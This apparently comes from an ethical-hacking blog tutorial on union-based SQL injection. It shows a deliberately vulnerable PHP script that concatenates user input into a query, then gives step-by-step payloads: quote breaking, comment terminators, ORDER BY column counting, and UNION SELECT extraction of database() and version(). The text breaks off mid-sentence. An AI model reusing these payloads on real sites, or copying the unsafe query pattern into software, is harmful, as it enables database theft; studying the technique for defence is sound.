Hello all, I hope you know how to do a SQL injection and have used it .In this tutorial we are going to see how it is working. What's going on under the hood. How web application handle our input and process the SQL quarry. Let's see. Imagine that there is a web application like this.

Front-End Web Application

Hear we see how web application takes input from the user and send that data to PHP script through a GET request.
<html>
<head>

<title>SQL Injection Tutorial - HacksLand</title>
</head>

<body>

<h1><center>HacksLand - Ethical Hacking Tutorials</center></h1>
<form method = "GET" action="index.php">
	<h2><center>Give the ID for fetch details</center></h2><br>
	<input align="center" type="text" name="id">

</form>

</body>
</html>
 

Back-end PHP Script

Now there should be a back-end script that handle this submitted data and make a SQL quarry. After SQL quarry return some data from database PHP script processes that data and give user output. Assume that following is the PHP code .
<?php
include("sql_connect.php");
if(isset($_GET['id']))
{
  $id=$_GET['id'];
  $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
  $result=mysqli_query($con, $sql);
  $row = mysqli_fetch_array($result, MYSQLI_BOTH);

  if($row)
  {
   echo 'Name for ID: '. $row['name'];
   echo "<br>";
   echo 'Age for ID: ' .$row['age'];
  }
  else
  {
   print_r(mysqli_error($con));
  }
}
else { echo "Please input the ID";}
?>
I hope you can understand what is going hear. For this example we need a table that used by SQL quarry to take data from.
ID NAME AGE COUNTRY SUBJECT
1 Jhone 24 USA Math
2 Thilan 21 SriLanka Physics
3 Clara 18 Germany Chemistry
4 stack 22 India English
5 heap 21 UK Sinhala
So all OK and fine.

SQL Quarry

Now let's see how this is happening. Imagine that I enter 3 as the input. So our ID will be equal to 3. What about our SQL quarry?
$sql="SELECT * FROM users WHERE id='3' LIMIT 0,1";
So it will give us the output. Name for ID: Clara Age for ID : 18 Nice!. It's look like web application is working fine. Do you remember in our previous tutorial we used a single quote to break a SQL quarry? what if  I enter  3'  as the input? It give me an error.
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''3'' LIMIT 0,1? at line 1
What the fuck goes hear?
$sql="SELECT * FROM users WHERE id='3'' LIMIT 0,1";
You can clearly see that there is a syntax error near ID='3''  . Previously I explained why this happening.

Injecting SQL Quarry

Now we have to see how we can fix this error and extract data from the database.  What if I enter flowing payload?. 3' --+ Now our quarry is.
$sql="SELECT * FROM users WHERE id='3' --+' LIMIT 0,1";
But actually we only care the code before --+ Because it's a comment character in SQL and everything after that will be ignored. So now this cod is valid and it'll give us the output as expected. This is the time to fetch data from database.But how? Can we use another SELECT command with this one? Yes indeed. we can use two SELECT commands with UNION operator like this.
SELECT Name,Age FROM users UNION SELECT Subject,ID FROM users
But one thing. Both of SELECT quarries must use slimier number of columns to fetch data. It's no matter that they use different columns , only amount of used columns should be same. You may say that  it's simple there are 5 columns in table. No buddy in real life you can't see the table and you can't figure out how many columns are there.  :-( We can you a trick for finding the number of columns used by first SELECT command. Think about our table and following commands.
SELECT * FROM users  ORDER BY Name SELECT * FROM users  ORDER BY 3
first command says select all columns from  the users table and the order of results should be accordion to Name column. Second command also says that but results should be order with 3rd column(Age). So even we don't know column names we can order by 1,2,3 etc OK. Now I enter this as the ID . 3'  order by 1--+ Let's see our quarry.
$sql="SELECT * FROM users WHERE id= '3' order by 1--+' LIMIT 0,1";
This gives us output as expected because there are more columns than 1 . So it's possible to order result accordion to the first column. Next we try order by 2. This also will be fine. Web application will work normally until we say order by 5. What if we enter order by 6 ? Surely it'll give an error because there are no 6 columns.  So by using this method we can find how many columns are using the first SELECT command. Now we can use another SELECT command
SELECT * FROM users WHERE id= '3' UNION SELECT 1,2,3,4,5 --+ ' LIMIT 0,1
What going on hear is SQL quarry think that there is another table like following and quarry try to fetch data from both of them. After those data will be print to screen by PHP code. Now if we can print data from second table we can find which columns are using by web application to show data.(In this example we know that PHP script get Name and Age columns). But unfortunately we still we can see only flowing output.  :-( Name for ID: Clara Age for ID : 18 why that?   Because while our SQL quarry see there are two tables it first try to fetch data from first table. So if  we want to get data from second one we must set a null value to first SELECT command .  Our final payload .
SELECT * FROM users WHERE id= '-3' UNION SELECT 1,2,3,4,5 --+ ' LIMIT 0,1
Since -3 is not in ID column data from our second table will be printed out. Name for ID: 2 Age for ID : 3 Finlay it's success. We can see column 2 and 3 is used by web app. Now we can use these 2 channels for get any data from database.   :-)

Extracting Basic information

First of all let's give a try to find out database name.  
SELECT * FROM users WHERE id= '-3' UNION SELECT 1,database(),3,4,5 --+ ' LIMIT 0,1
we can see the database name in the screen. Name for ID: database_name Age for ID : 3
SELECT * FROM users WHERE id= '-3' UNION SELECT 1,version(),3,4,5 --+ ' LIMIT 0,1
Like this you can use database() , user() , version() etc to fetch some basic data. In next tutorial we are going to learn how to use SQL injection to